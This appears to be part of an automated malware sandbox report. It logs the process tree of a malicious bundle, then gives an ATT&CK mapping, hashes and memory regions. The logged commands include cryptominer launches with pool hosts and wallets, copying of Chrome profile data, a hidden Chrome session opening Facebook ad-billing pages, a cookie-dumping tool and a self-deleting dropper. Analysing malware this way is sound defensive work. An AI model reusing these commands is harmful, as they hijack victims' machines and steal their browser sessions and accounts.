                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\30CB.tmp.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:5628
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3214.tmp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3214.tmp.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:2260
                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23413 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                    PID:5184
                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w18262@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6084
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4264
                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                        PID:5296
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\askinstall20.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX5\askinstall20.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4360
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5008
                                                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        PID:3548
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        PID:5304
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffbafb54f50,0x7ffbafb54f60,0x7ffbafb54f70
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:5552
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1468 /prefetch:2
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5560
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              PID:5584
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:5344
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:6084
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:508
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:4808
                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:5020
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:2916
                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,9261477318290661839,14899054632759882610,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5804 /prefetch:8
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:4404
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX5\md4_4igk.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX5\md4_4igk.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                          PID:1724
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:4540
                                                                                                                                                                                                                          • C:\ProgramData\2524898.exe
                                                                                                                                                                                                                            "C:\ProgramData\2524898.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5856
                                                                                                                                                                                                                          • C:\ProgramData\6693924.exe
                                                                                                                                                                                                                            "C:\ProgramData\6693924.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                            PID:4220
                                                                                                                                                                                                                          • C:\ProgramData\5065700.exe
                                                                                                                                                                                                                            "C:\ProgramData\5065700.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:5948
                                                                                                                                                                                                                            • C:\ProgramData\5065700.exe
                                                                                                                                                                                                                              "{path}"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:3204
                                                                                                                                                                                                                          • C:\ProgramData\3437476.exe
                                                                                                                                                                                                                            "C:\ProgramData\3437476.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:1352
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:4760
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:1340
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:1788
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:6024
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:4780

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                  2
                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                  3
                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                  3
                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                  4
                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1018

                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                  3
                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    ebc22873bda6f7a7e0748bb8622888c0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    a5ca955eed5216b0a0c8b976e24d404419b20618

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    35abad36a549e8e712bd146a8d95c03f873e9937ae98398aa32b6458c37ac910

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    dd57fbe5f81707752b728134fb4b14a1d7a3014beca690749002cd00cbf055ac2fa5ca30f7dd2dda9f3e708c349febd0d3e538342951e7a1b209eb81a17b2ed1

                                                                                                                                                                                                                  • \??\pipe\crashpad_5072_VJYHZASKFWTJSWBY
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                  • \??\pipe\crashpad_644_BRUJYHHDCBHYEVND
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                  • memory/64-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/68-263-0x0000027FAC210000-0x0000027FAC277000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/340-255-0x0000026116740000-0x00000261167A7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/340-301-0x0000026116D40000-0x0000026116DA7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/424-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/664-287-0x0000000002900000-0x0000000002901000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/692-297-0x000001D6229E0000-0x000001D622A47000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/692-248-0x000001D622700000-0x000001D622744000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    272KB

                                                                                                                                                                                                                  • memory/692-249-0x000001D622900000-0x000001D622967000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/744-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/848-286-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/1096-307-0x0000029F01440000-0x0000029F014A7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/1096-261-0x0000029F00770000-0x0000029F007D7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/1120-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/1180-269-0x0000026034FB0000-0x0000026035017000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/1332-285-0x00000000011A0000-0x00000000011A2000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/1376-271-0x000002AD6F400000-0x000002AD6F467000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/1428-265-0x000001F56A200000-0x000001F56A267000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/1472-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/1500-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/1568-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/1908-267-0x000001430C400000-0x000001430C467000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/1928-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/2068-279-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    7.0MB

                                                                                                                                                                                                                  • memory/2068-292-0x000001BFF0F70000-0x000001BFF0F90000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                  • memory/2068-284-0x000001BFF0F50000-0x000001BFF0F70000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                  • memory/2080-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/2228-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/2264-276-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    284KB

                                                                                                                                                                                                                  • memory/2576-259-0x00000154C7CD0000-0x00000154C7D37000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2576-305-0x00000154C8740000-0x00000154C87A7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2608-257-0x000002209B490000-0x000002209B4F7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2608-303-0x000002209BB00000-0x000002209BB67000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2636-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/2756-299-0x0000028AEC540000-0x0000028AEC5A7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2756-252-0x0000028AEBFA0000-0x0000028AEC007000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2800-295-0x0000000004860000-0x00000000048B6000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    344KB

                                                                                                                                                                                                                  • memory/2800-294-0x00000000047B0000-0x00000000047EA000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                  • memory/2836-275-0x000001B333A40000-0x000001B333AA7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2852-273-0x000001D2CBB40000-0x000001D2CBBA7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/2956-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/3232-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/3492-289-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/3492-288-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/3584-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/3584-123-0x00007FFBBC1C0000-0x00007FFBBC1C1000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/3808-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/3812-290-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/4060-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4140-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4208-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4280-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4288-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4340-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4344-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4384-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4408-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4412-246-0x0000000003FC0000-0x0000000004016000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    344KB

                                                                                                                                                                                                                  • memory/4412-245-0x0000000000240000-0x000000000038A000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.3MB

                                                                                                                                                                                                                  • memory/4480-291-0x0000000004E10000-0x0000000004E11000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/4496-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4532-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4660-253-0x0000022AA6640000-0x0000022AA66A7000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                  • memory/4660-283-0x0000022AA8030000-0x0000022AA8135000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                  • memory/4668-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4728-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4740-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4748-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4756-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4768-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4804-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4808-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4812-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4816-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4852-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4864-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4864-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4876-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4924-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4924-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4960-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/4972-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5000-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5008-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5032-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5060-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5072-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5076-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5092-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5160-293-0x0000000002730000-0x00000000028CC000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                  • memory/5160-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5204-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5264-247-0x0000000002CC0000-0x0000000002E5C000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                  • memory/5300-278-0x0000000000400000-0x0000000002BF2000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    39.9MB

                                                                                                                                                                                                                  • memory/5300-277-0x0000000004900000-0x0000000004991000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    580KB

